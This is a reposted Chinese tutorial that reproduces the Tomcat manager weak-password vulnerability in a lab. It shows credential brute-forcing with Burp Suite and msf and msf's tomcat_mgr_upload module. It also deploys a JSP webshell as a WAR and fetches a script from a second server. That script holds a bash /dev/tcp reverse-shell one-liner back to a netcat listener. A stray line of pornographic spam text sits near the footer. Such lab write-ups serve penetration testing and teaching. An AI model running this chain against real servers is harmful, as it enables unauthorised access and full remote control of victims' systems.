您的位置:首頁 > 教程 > tomcat > Tomcat弱口令復現及利用(反彈shell)

Tomcat弱口令復現及利用(反彈shell)

2022-05-05 14:20:43 來源:易采站長站 作者:

Tomcat弱口令復現及利用(反彈shell)

目錄
漏洞描述復現環境攻擊流程利用msf利用反彈shell利用參考文章

漏洞描述

Tomcat有一個管理后臺,其用戶名和密碼在Tomcat安裝目錄下的conf\tomcat-users.xml文件中配置,不少管理員為了方便,經常采用弱口令。Tomcat 支持在后臺部署 war 文件,可以直接將 webshell 部署到 web 目錄下。其中,欲訪問后臺,需要對應用戶有相應權限。
Tomcat7+ 權限分為:
manager(后臺管理)

manager-gui 擁有html頁面權限
manager-status 擁有查看status的權限
manager-script 擁有text接口的權限,和status權限
manager-jmx 擁有jmx權限,和status權限
host-manager(虛擬主機管理)

admin-gui 擁有html頁面權限
admin-script 擁有text接口權限
二、漏洞影響
Tomcat <= 6.0.0 默認用戶名為admin,密碼為空,無暴力破解限制。
Tomcat >= 6.0.0 無默認用戶,五次失敗后,賬戶即被鎖定。
但是正常安裝的情況下,tomcat8 中默認沒有任何用戶,且 Manager 頁面只允許本地 IP 訪問。只有管理員手工修改了這些屬性的情況下,才可以進行攻擊。

復現

環境

一臺攻擊機(kali-2021)192.168.141.190
受害機(vulhub搭建的)192.168.141.194
一臺用來下載反彈shell腳本的服務器(內網,如果有服務器更好)192.168.141.128(利用時讓受害主機下載shell文件實現反彈shell)

攻擊流程

按照前人經驗可以使用burpsuite進行爆破或者使用msf進行爆破
首先是根據burpsuite進行爆破:
抓取請求數據包可以看到

在這里插入圖片描述

=其中沒有看到熟悉的賬號密碼,但是其中’Authorization: Basic dG9tY2F0OnRvbWNhdA=='將其中的base64字符串解密可以看到結果格式為"tomcat:tomcat"所以將請求包送至爆破模塊,構造格式為x:x的payload

在這里插入圖片描述

在這里插入圖片描述

在這里插入圖片描述

在這里插入圖片描述

結果中的200即為成功,但是前面說明了tomcat8或有防爆破機制,當一個用戶名登錄超過五次就會鎖定賬戶,網上有說要用"tomcat暴破圖形化—繞過tomcat 6/7/8的防暴破機制"這個腳本來繞過但是作者沒有找到免費的,就不測試了.
其次使用過msf進行爆破

在這里插入圖片描述

msf中找到上面的模塊配置出options的rhosts和rport就可以進行爆破(run)了

在這里插入圖片描述

可以看到用戶名和密碼在都是tomcat的時候爆破成功,而且可以看到msf應該是自帶了繞過防爆破腳本,而且可以通過自定義user和password文件進行測試,所以作者更推薦使用msf爆破方式

利用

msf利用

這里強調一下,在作者復現網上說的使用exploit/multi/http/tomcat_mgr_deploy但是在配置好rhoss和rport進行run的時候出現無法拿到shell問題

在這里插入圖片描述

所以作者使用了exploit/multi/http/tomcat_mgr_upload進行利用配置同deploy,配置httpusername,httppassword,rhosts.rport 然后運行拿到shell

在這里插入圖片描述

反彈shell利用

整體思路:首先在網頁端登錄進管理后臺上傳jsp后門文件,然后訪問這個jsp后門即可,雖然上傳之后就可以通過shell軟件控制,但是為了復習反彈shell的過程,作者將進一步通過上傳的jsp一句話木馬(也可以上傳大馬)進行反彈shell.

首先將一句話shelloneword.jsp(一句話木馬文件)通過命令,jar cvf shelloneword.war shelloneword.jsp 執行成功后在管理后臺找到如下然后上傳

在這里插入圖片描述

在這里插入圖片描述

成功之后可以在這看到結果

之后通過各種軟件訪問http://192.168.141.194:8080/shelloneword/shelloneword.jsp?i= xxxx就行了

但是作者的方式是通過讓受害主機訪問服務器主機下載shell文件,進行反彈shell,所以前面只是中間過程,首先讓受害主機執行i=curl -o /shell.sh http://192.168.141.128/shell.txt 其中shell.txt文件內容為

bash -i >& /dev/tcp/192.168.141.190/7777 0>&1

將ip和端口改為自己的,然后打開nc 監聽7777端口,訪問http://192.168.141.194:8080/shelloneword/shelloneword.jsp?i=bash /shell.sh

在這里插入圖片描述

反彈shell成功

參考文章

[1] https://blog.csdn.net/QQ_33020901/article/details/98357659
[2] https://blog.csdn.net/weixin_44037296/article/details/116376114
[3] https://blog.csdn.net/qq_43665434/article/details/116903953
[4] https://www.cnblogs.com/henry666/p/14379888.html
[5]https://www.cnblogs.com/qianxinggz/p/13440366.html
[6]https://blog.csdn.net/weixin_42432317/article/details/90208213

到此這篇關于Tomcat弱口令復現及利用(反彈shell)的文章就介紹到這了,更多相關Tomcat弱口令復現內容請搜索易采站長站以前的文章或繼續瀏覽下面的相關文章希望大家以后多多支持易采站長站!

如有侵權,請聯系QQ:279390809 電話:15144810328

相關文章

  • 基于tomcat配置文件server.xml詳解

    基于tomcat配置文件server.xml詳解

    1. 入門示例:虛擬主機提供web服務 該示例通過設置虛擬主機來提供web服務,因為是入門示例,所以設置極其簡單,只需修改$CATALINA_HOME/conf/server.xml文件為如下內容即可。其中大部分都采
    2019-10-18
  • 解決Tomcat使用shutdown.bat關閉會將其他Tomcat關掉的問題

    解決Tomcat使用shutdown.bat關閉會將其他Tomcat關掉的問題

    shutdown.bat文件有一句 if not "%CATALINA_HOME%" == "" goto gotHome 執行關閉命令的時候,程序會根據CATALINA_HOME去查找,這句話的意思是如果環境變量配置的這個路徑不為空,就執行這個,否則就“
    2019-10-18
  • window和linux通過tomcat9手工部署war包的方法

    window和linux通過tomcat9手工部署war包的方法

    親測在windows環境和linux環境不一樣 Windows 第1步: 用maven打war包 (假如得到的war包名為: hello-back.war) 第2步: 把war包拷貝到tomcat安裝的webapps目錄下 第3步: 啟動tomcat (可以在conf/server.xml修改端
    2019-10-18
  • tomcat配置https的方法示例

    tomcat配置https的方法示例

    一、創建生產密鑰和證書 Tomcat 目前只能操作 JKS、PKCS11、PKCS12 格式的密鑰存儲庫。JKS 是 Java 標準的“Java 密鑰存儲庫”格式,是通過 keytool 命令行工具創建的。該工具包含在 JDK 中。
    2019-10-18
  • 關于Tomcat服務器無法打開tomcat7w.exe的解決辦法

    關于Tomcat服務器無法打開tomcat7w.exe的解決辦法

    今天配置Tomcat服務器的時候遇到了一點問題,提供借鑒。關于配置教程網上很多自己參考,如果遇到問題可以查看下面這個鏈接基本說的比較詳細:https://zhidao.baidu.com/question/87407926107
    2019-10-18
  • tomcat加載jar異常問題的分析與解決

    tomcat加載jar異常問題的分析與解決

    現象描述: 項目使用springboot啟動一個web項目,在啟動階段看到console中出現了異?!?.10.3-1.4.3hdf5.jar 系統找不到指定的文件”,雖然這些異常不影響項目的正常運行,但作為一個嚴謹的
    2019-10-18
  • tomcat訪問(access)日志配置和記錄Post請求參數

    tomcat訪問(access)日志配置和記錄Post請求參數

    一、配置與說明 tomcat訪問日志格式配置,在config/server.xml里Host標簽下加上 Valve className="org.apache.catalina.valves.AccessLogValve" directory="logs" prefix="localhost_access_log." suffix=".txt" pattern="%h %l %u %t
    2019-10-18
  • 詳解用Tomcat服務器配置https雙向認證過程實戰

    詳解用Tomcat服務器配置https雙向認證過程實戰

    工具:keytool (Windows下路徑:%JAVA_HOME%/bin/keytool.exe) 環境:Windows8.1企業版、Tomcat-7.0.27、JDK1.6、IE11、Chrome 一、為服務器生成證書 C:Windowssystem32keytool -genkey -v -alias tomcat -keyalg RSA -keys
    2019-10-18
色七七影院_香港三级台湾三级在线播放_男人放进女人阳道猛进猛出